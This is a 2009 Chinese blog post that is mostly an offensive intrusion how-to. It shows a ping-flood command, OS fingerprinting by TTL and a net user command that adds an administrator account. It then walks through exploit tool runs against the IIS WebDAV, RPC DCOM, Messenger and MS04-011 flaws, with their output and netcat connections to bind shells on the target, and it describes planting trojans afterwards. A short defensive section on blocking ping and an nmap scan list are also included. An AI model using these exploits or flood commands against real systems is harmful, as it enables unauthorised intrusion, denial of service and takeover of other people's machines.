Chinaunix首页 | 论坛 | 博客
  • 博客访问: 222106
  • 博文数量: 88
  • 博客积分: 3020
  • 博客等级: 中校
  • 技术积分: 707
  • 用 户 组: 普通用户
  • 注册时间: 2009-02-12 16:56
文章分类
文章存档

2010年(26)

2009年(62)

我的朋友

分类: 网络与安全

2009-06-05 09:09:51

     Ping 攻击

  在默认的情况下windows的ping发送的数据包大小为32byt,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送65500byt,可以通过配合-t参数来实现一个带有攻击性的命令:

  C:\>ping -l 65500 -t 192.168.1.21  
  Pinging 192.168.1.21 with 65500 bytes of data:  
  Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254  
  Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254  
  ………………

这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包,如果你只有一台计算机也许没有什么效果,但如果有很多计算机那么就可以使对方完全瘫痪。  

禁止ping自己的主机 windows 2000
我的电脑-控制面板-管理工具-本地安全策略-ip安全策略
这是2000给我们的配置ip管理的工具,我这里只说一下如何禁止别人ping我的主机。
共有四个步骤:
1。建立禁ping 规则
2。建立禁止/允许规则
3。把这两个规则联系在一起
4。指派
详细:
1。右击ip安全策略-管理ip筛选器表和筛选器操作-ip筛选器列表-添加:名称:ping;描述:ping;(勾选“使用添加向导”),---添加-下一步:指定源/目的ip ,协议类型(icmp),下一步直至完成,关闭此对话框。
2。管理ip筛选器表和筛选器操作-管理筛选器操作-添加(勾选“使用添加向导”)-下一步:名称:refuse;描述:refuse--下一步:阻止-下一步直至完成。
3。右击ip安全策略-创建ip安全策略-下一步:名称:禁止ping;--下一步:取消激活默认响应规则-下一步:选中选中“编辑属性“-完 成。然后再“禁止ping属性“上-添加(勾选“使用添加向导”)-下一步直至“身份验证方法”;选第三项,输入共享字串-下一步:在ip筛选器列表里选 “ping"--下一步:选“refuse"-下一步到完成。这是你在“本地安全设置“右侧会看到“禁止ping“这条规则,但是现在他还没有起作用。
4。右击“禁止ping“--指派。
这回一条禁止别人ping自己的机器的ip策略完成了。
找个机器试试,自己的机器不行。会提示:请求超时(timeout).

禁止ping自己的主机 Linux
在linux里,如果要想使ping 没反应也就是用来忽略icmp包.
可以用
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
若想恢复就用
echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all

通过ping获取局域网的MAC地址
首先 ping xxx.xxx.xxx.xxx
然后通过命令 arp –a 来显示arp表,在里面查找对应的IP 和MAC地址表。

简单判断操作系统方法
首先 ping xxx.xxx.xxx.xxx 跟据返回的TTL值来判断相应的操作系统。
不同的操作系统,它的TTL值也是不相同的,默认情况下:
Linux系统     TTL值为64或255
Windows NT/2000/XP 系统  TTL值为128
Windows 98系统    TTL值为32
UNIX主机     TTL值为255。

ICMP数据包的TTL值,每遇到一个路由设备转发时,TTL值就会被减去1,因此只要看TTL值和哪个比较接近就会判断相应的操作系统

修改windows NT/2000/XP  TTL值
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
新建双字节值 DefaultTTL 输入十进制的你想要显示的TTL值


漏洞攻击 windows系列
必备工具
远程控制工具
开端口工具
自己的ftp / tftp服务器
远程桌面程序
建立用户并加到administrator组命令
net user 用户名 密码 /add
net localgroup 组名 用户名 /add
例:net localgroup administrators geust /add

IPC漏洞


WEBDAV漏洞
受影响系统:windows 2000+IIS5.0
扫描工具:webdavscan.exe
利用扫描工具寻找有此漏洞的目标主机。
攻击工具:webdavx3.exe、nc.exe
注:若webdavx3.exe不能使用,试着将日期修改到2003年1月
C:\>webdavx3 192.168.0.1
IIS WebDAV overflow remote exploit by isno@xfocus.org
start to try offset,
if STOP a long time, you can press ^C and telnet 192.168.0.1 7788
try offset: 0
……
try offset: 19
try offset: -1
try offset: -2
try offset: -3
waiting for iis restart....................... (IIS在这里重起了,等一会)
try offset: -4   (程序运行到这里停顿下来了,如果停顿时间比较长都没有反应,就按Ctrl+C,然后连上目标的7788端口去)
^C
C:\>nc -vv 192.168.0.1 7788
192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.0.1] 7788 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>
此时可以在命令行做 创建用户,上传木马,打开端口等进一步入侵工作
解决方案:安装安全补丁

DOCM RPC漏洞
受影响系统:windows nt4.0/2000/xp/2003
描扫工具: retinarpcdcom.exe和scanrpc.exe 前者是图形界面,后者是命令行的。
Scanrpc ipaddr-ipaddr
攻击工具:rpcdcom.exe 、nc.exe
C:\rpcdcom>rpcdcom 192.168.0.1
Usage:
rpcdcom  
Options:
-host: Hostname to attack [Required]
-Target ID: Target ID [Default: 0]
             0 [All Chinese Version Windows]: [0x7ffa4512]
             1 [All Japanese Version Windows]: [0x7ffb6fd0]
             2 [All Big5 Version Windows]: [0x7ffc37b6]
              3 [All Korean Version Windows]: [0x7ffa4a1b]
              4 [Win2k-Universal]: [0x0018759f]
              5 [WinXP-Universal]: [0x0100139d]
-Attack port: Attack port [Default: 135]
-BindShell port: Bindshell port [Default: 8888]

C:\rpcdcom>rpcdcom 192.168.0.1 4 135 8888
[+] Resolving host.. 192.168.0.1
[+] Target: [Win2k-Universal]:192.168.0.1:135, Bindshell:8888, RET=[0x0018759f]
[+] Use Netcat to connect to 192.168.0.1:8888

C:\rpcdcom>nc 192.168.0.1 8888
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>
此时可以在命令行做 创建用户,上传木马,打开端口等进一步入侵工作
解决方案:打好补丁;关闭135端口

Messager漏洞
受影响系统:windows 2000/XP/2003
扫描工具:MessengerScan.exe、MessengerScan.exe
攻击工具:msgr.exe、nc.exe
打开RetinaMSGSVC.exe,开始对目标进行扫描。
使用msgr.exe对目标进行溢出,成功后将在目标主机的9191端口绑定一个shell,便于我们进行下一步控制。
命令格式如:msgr.exe 192.168.0.2 0
  使用NC等工具进行进一步入侵
解决方法:打补丁/关闭message服务

MS04011漏洞
受影响系统:windows 2000/XP
扫描工具:DSScan.exe
攻击工具:m*04011.**e、geto*.**e
打开Dsscan.exe,开始对目标进行扫描。
使用geto*.**e了解目标的操作系统
执行nc –b –v –p 端口号 进行监听
执行ms04001 0/1 目标IP 端口号 本机IP
  使用NC等工具进行进一步入侵
解决方法:打补丁

漏洞攻击 Linux 系列
扫描
工具:nmap 使用
ping 扫描: nmap –sP 192.168.1.*
TCP ping 扫描:nmap –PT 192.168.1.1
TCP 连接端口扫描:nmap –sT 192.168.1.1
TCP SYN扫描: nmap –sS 192.168.1.1
FIN 扫描:nmap –sF 192.168.1.1
反向ident扫描 nmap –I –sT –p 192.168.1.1
XMAS扫描 nmap –sX 192.168.1.1
空扫描 nmap –sN 192.168.1.1
RPC扫描 nmap –sR 192.168.1.1
IP扫描 nmap –sO 192.168.1.1
ACK扫描 nmap –sA 192.168.1.1
窗口扫描 nmap –sW 192.168.1.1
UDP扫描 nmap –sU 192.168.1.1

操作系统识别

nmap –O 192.168.1.1
识别远端服务
amap –sT 192.168.1.1 9934
获得ftp服务版本信息
阅读(678) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~